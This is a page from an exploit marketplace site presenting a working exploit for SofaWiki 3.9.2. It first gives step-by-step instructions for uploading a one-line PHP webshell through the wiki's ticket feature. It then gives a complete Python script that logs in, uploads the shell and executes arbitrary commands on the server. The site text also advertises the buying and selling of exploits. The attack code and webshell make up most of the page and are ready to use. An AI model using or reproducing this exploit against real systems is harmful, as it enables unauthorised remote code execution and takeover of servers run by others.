0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
SofaWiki 3.9.2 Shell Upload Exploit
# Exploit Title: SofaWiki 3.9.2 - Remote Code Execution (RCE) via Open Ticket File Upload # Exploit Author: Chokri Hammedi # Vendor Homepage: https://www.sofawiki.com # Software Link: https://www.sofawiki.com/site/files/snapshot.zip # Version: 3.9.2 # Tested on: Windows XP Summary: A remote code execution (RCE) vulnerability exists in the Open Ticket feature of SofaWiki 3.9.2. An attacker can upload a malicious `.phar` file that contains PHP code, bypassing `.htaccess` restrictions, and execute arbitrary commands on the server. Exploit Steps: 1. Login to SofaWiki. 2. Navigate to Special → Tickets → New Ticket: http://localhost/sofawiki/index.php?name=special:tickets&ticketaction=new 3. Select your shell.phar file with this content: <?php system($_GET['cmd']); ?> 4. Fill in the ticket title and click Open Ticket. 5. After the ticket is created, the page shows a link to the uploaded shell.phar 6. access the webshell: http://localhost/sofawiki/site/files/ticket-1-shell.phar?cmd=whoami -------------- # Exploit Title: SofaWiki 3.9.2 - RCE (authenticated) via Open Ticket File Upload Exploit # Date: 10/17/2024 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://www.sofawiki.com # Software Link: https://www.sofawiki.com/site/files/snapshot.zip # Version: 3.9.2 # Tested on: Windows XP import requests import re import sys class SofaWikiExploit: def __init__(self, base_url, username, password): self.base_url = base_url.rstrip('/') self.username = username self.password = password self.session = requests.Session() def detect_login_name(self): response = self.session.get(f"{self.base_url}/index.php?action=login") match = re.search(r'name="name" value="([^"]+)"', response.text) if not match: print("\033[91m\033[1m[-] couldn't find the 'name' field. Exiting.\033[0m") sys.exit(1) return match.group(1) def login(self): print("\033[93m[*] logging in...\033[0m") login_name = self.detect_login_name() data = { "submitlogin": "Login", "username": self.username, "pass": self.password, "name": login_name, "action": "login" } response = self.session.post(f"{self.base_url}/index.php", data=data) if "Logout" in response.text: print("\033[92m\033[1m[+] Login successful!\033[0m") return True print("\033[91m[-] login failed.\033[0m") return False def upload_shell(self): print("\033[93m[*] uploading shell...\033[0m") shell_content = '<?php system($_GET["cmd"]); ?>' files = { 'uploadedfile': ('shell.phar', shell_content, 'application/octet-stream'), 'title': (None, 'Chokri Hammedi Exploit'), 'text': (None, 'Chokri Hammedi RCE'), 'assigned': (None, 'admin'), 'priority': (None, '1 high'), 'submitopen': (None, 'Open Ticket'), 'MAX_FILE_SIZE': (None, '8000000') } response = self.session.post(f"{self.base_url}/index.php?name=special:tickets", files=files) match = re.search(r'File (.*?) uploaded', response.text) if not match: print("\033[91m[-] shell upload failed.\033[0m") sys.exit(1) shell_url = f"{self.base_url}/site/files/{match.group(1)}" print(f"\033[92m[+] shell uploaded: {shell_url}\033[0m") return shell_url def execute_command(self, shell_url, cmd): print(f"\033[93m[*] running command: {cmd}\033[0m") response = self.session.get(f"{shell_url}?cmd={cmd}") print("\033[92m[+] command output:\033[0m") print(f"\033[1m{response.text}\033[0m") if __name__ == "__main__": if len(sys.argv) != 5: print(f"\033[91musage: {sys.argv[0]} <target_url> <username> <password> <cmd>\033[0m") sys.exit(1) target_url, username, password, cmd = sys.argv[1:5] exploit = SofaWikiExploit(target_url, username, password) if exploit.login(): shell_url = exploit.upload_shell() exploit.execute_command(shell_url, cmd) # 0day.today [2024-12-23] #